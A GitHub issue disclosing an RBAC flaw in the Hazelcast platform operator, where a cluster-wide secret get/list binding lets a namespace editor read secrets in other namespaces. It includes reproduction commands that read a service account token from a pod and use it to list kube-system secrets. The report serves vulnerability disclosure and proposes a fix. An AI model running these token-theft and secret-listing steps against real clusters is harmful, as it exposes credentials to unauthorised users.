### ISSUE TITLE
[Vulnerability] Operator grants cluster-wide secret list/get privileges to namespaced ServiceAccount

### ISSUE THREAD

**Issue by chobostar** [hazelcast/hazelcast-platform-operator#390]
Here is ClusterRole with secret list/get verbs is created:
https://github.com/hazelcast/hazelcast-platform-operator/blob/v5.4/controllers/hazelcast/hazelcast_resources.go#L205-L211
```
		Rules: []rbacv1.PolicyRule{
			{
				APIGroups: []string{""},
				Resources: []string{"endpoints", "pods", "nodes", "services", "secrets"},
				Verbs:     []string{"get", "list"},
			},
		},
```

Here operator creates ClusterRoleBinding:
https://github.com/hazelcast/hazelcast-platform-operator/blob/v5.4/controllers/hazelcast/hazelcast_resources.go#L251-L280

As a result the namespace editor could read cluster-wide secrets:
1. Create hazelcast cluster:
```
kind: Hazelcast
apiVersion: hazelcast.com/v1alpha1
metadata:
  name: example-hz
  namespace: demo
spec:
  clusterSize: 3
  repository: hazelcast/hazelcast
  version: 5.1-slim
  resources:
    requests:
      memory: 256Mi
      cpu: 250m
    limits:
      memory: 512Mi
      cpu: 500m
```

2. Get token:
```
$ export TOKEN=$(kubectl -n demo run -ti ubuntu --image=ubuntu --overrides='{"spec":{"serviceAccount":"example-hz" }}' --restart=Never -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
```

3. Read cluster secrets:
```
$ oc --token="$TOKEN" whoami
system:serviceaccount:demo:example-hz

$ oc get secrets --token="$TOKEN" -n kube-system | wc -l 
108
```

I suppose atleast ClusterRole + RoleBinding should be created instead of ClusterRole + ClusterRoleBinding.
